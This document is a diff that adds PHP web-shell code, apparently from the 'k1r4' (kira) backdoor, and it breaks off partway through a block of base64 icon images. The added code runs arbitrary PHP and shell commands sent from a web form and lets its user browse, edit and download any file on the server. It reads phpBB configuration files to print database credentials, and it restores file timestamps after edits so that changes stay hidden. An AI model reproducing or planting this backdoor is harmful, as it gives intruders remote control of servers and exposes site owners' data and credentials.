+ $olddir = realpath(".");
+ @chdir($d);
+ if ($tmp)
+ {
+ ob_clean();
+ eval($eval);
+ $ret = ob_get_contents();
+ $ret = convert_cyr_string($ret,"d","w");
+ ob_clean();
+ echo $tmp;
+ if ($eval_txt)
+ {
+ $rows = count(explode("\r\n",$ret))+1;
+ if ($rows < 10) {$rows = 10;}
+ echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+ }
+ else {echo $ret."<br>";}
+ }
+ else
+ {
+ if ($eval_txt)
+ {
+ echo
"<br><textarea cols=\"122\" rows=\"15\" readonly>";
+ eval($eval);
+ echo "</textarea>";
+ }
+ else {echo $ret;}
+ }
+ @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+ if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+ else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+ $r = @file_get_contents($d.$f);
+ $ext = explode(".",$f);
+ $c = count($ext)-1;
+ $ext = $ext[$c];
+ $ext = strtolower($ext);
+ $rft = "";
+ foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+ if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+ if (empty($ft)) {$ft = $rft;}
+ $arr = array(
+ array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
+ array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
+ array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
+ array("Code","code"),
+ array("Session","phpsess"),
+ array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
+ array("SDB","sdb"),
+ array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
+ array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
+ array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
+ array("<img
src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
+ array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
+ );
+ echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+ foreach($arr as $t)
+ {
+ if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+ elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+ else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+ echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+ }
+ echo "<hr size=\"1\" noshade>";
+ if ($ft == "info")
+ {
+ echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+ if (!$win)
+ {
+ echo "<tr><td><b>Owner/Group</b></td><td> ";
+ $ow = posix_getpwuid(fileowner($d.$f));
+ $gr = posix_getgrgid(filegroup($d.$f));
+ echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+ }
+ echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+ $fi = fopen($d.$f,"rb");
+ if ($fi)
+ {
+ if
($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+ else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+ $n = 0;
+ $a0 = "00000000<br>";
+ $a1 = "";
+ $a2 = "";
+ for ($i=0; $i<strlen($str); $i++)
+ {
+ $a1 .= sprintf("%02X",ord($str[$i]))." ";
+ switch (ord($str[$i]))
+ {
+ case 0: $a2 .= "<font>0</font>"; break;
+ case 32:
+ case 10:
+ case 13: $a2 .= "&nbsp;"; break;
+ default: $a2 .= htmlspecialchars($str[$i]);
+ }
+ $n++;
+ if ($n == $hexdump_rows)
+ {
+ $n = 0;
+ if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+ $a1 .= "<br>";
+ $a2 .= "<br>";
+ }
+ }
+ //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
+ echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
+ }
+ $encoded = "";
+ if ($base64 == 1)
+ {
+ echo "<b>Base64 Encode</b><br>";
+ $encoded = base64_encode(file_get_contents($d.$f));
+ }
+ elseif($base64 == 2)
+ {
+ echo "<b>Base64 Encode + Chunk</b><br>";
+ $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+ }
+ elseif($base64 == 3)
+ {
+ echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+ $encoded = base64_encode(file_get_contents($d.$f));
+ $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+ }
+ elseif($base64 == 4)
+ {
+ $text = file_get_contents($d.$f);
+ $encoded = base64_decode($text);
+ echo "<b>Base64 Decode";
+ if (base64_encode($encoded) != $text) {echo " (failed)";}
+ echo "</b><br>";
+ }
+ if (!empty($encoded))
+ {
+ echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+ }
+ echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a
href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+ }
+ elseif ($ft == "html")
+ {
+ if ($white) {@ob_clean();}
+ echo $r;
+ if ($white) {k1r4exit();}
+ }
+ elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+ elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+ elseif ($ft == "phpsess")
+ {
+ echo "<pre>";
+ $v = explode("|",$r);
+ echo $v[0]."<br>";
+ var_dump(unserialize($v[1]));
+ echo "</pre>";
+ }
+ elseif ($ft == "exe")
+ {
+ $ext = explode(".",$f);
+ $c = count($ext)-1;
+ $ext = $ext[$c];
+ $ext = strtolower($ext);
+ $rft = "";
+ foreach($exeftypes as $k=>$v)
+ {
+ if (in_array($ext,$v)) {$rft = $k; break;}
+ }
+ $cmd = str_replace("%f%",$f,$rft);
+ echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+ }
+ elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+ elseif ($ft == "code")
+ {
+ if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
+ {
+ $arr = explode("\n",$r);
+ if (count($arr == 18))
+ {
+ include($d.$f);
+ echo "<b>phpBB configuration is detected in this file!<br>";
+ if ($dbms == "mysql4") {$dbms = "mysql";}
+ if ($dbms == "mysql") {echo "<a
href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+ else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by kira. Please, report us for fix.";}
+ echo "Parameters for manual connect:<br>";
+ $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+ foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+ echo "</b><hr size=\"1\" noshade>";
+ }
+ }
+ echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+ if (!empty($white)) {@ob_clean();}
+ highlight_file($d.$f);
+ if (!empty($white)) {k1r4exit();}
+ echo "</div>";
+ }
+ elseif ($ft == "download")
+ {
+ @ob_clean();
+ header("Content-type: application/octet-stream");
+ header("Content-length: ".filesize($d.$f));
+ header("Content-disposition: attachment; filename=\"".$f."\";");
+ echo $r;
+ exit;
+ }
+ elseif ($ft == "notepad")
+ {
+ @ob_clean();
+ header("Content-type: text/plain");
+ header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+ echo($r);
+ exit;
+ }
+ elseif ($ft == "img")
+ {
+ $inf = getimagesize($d.$f);
+ if (!$white)
+ {
+ if (empty($imgsize)) {$imgsize = 20;}
+ $width = $inf[0]/100*$imgsize;
+ $height = $inf[1]/100*$imgsize;
+ echo "<center><b>Size:</b>&nbsp;";
+ $sizes = array("100","50","20");
+ foreach ($sizes as $v)
+ {
+ echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+ if ($imgsize != $v ) {echo $v;}
+ else {echo "<u>".$v."</u>";}
+ echo "</a>&nbsp;&nbsp;&nbsp;";
+ }
+ echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\"
width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+ }
+ else
+ {
+ @ob_clean();
+ $ext = explode($f,".");
+ $ext = $ext[count($ext)-1];
+ header("Content-type: ".$inf["mime"]);
+ readfile($d.$f);
+ exit;
+ }
+ }
+ elseif ($ft == "edit")
+ {
+ if (!empty($submit))
+ {
+ if ($filestealth) {$stat = stat($d.$f);}
+ $fp = fopen($d.$f,"w");
+ if (!$fp) {echo "<b>Can't write to file!</b>";}
+ else
+ {
+ echo "<b>Saved!</b>";
+ fwrite($fp,$edit_text);
+ fclose($fp);
+ if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+ $r = $edit_text;
+ }
+ }
+ $rows = count(explode("\r\n",$r));
+ if ($rows < 10) {$rows = 10;}
+ if ($rows > 30) {$rows = 30;}
+ echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+ }
+ elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+ else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+}
+else
+{
+ @ob_clean();
+ $images = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". 
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". 
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". +"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". +"yAsokBkQADs=", +"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". +"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
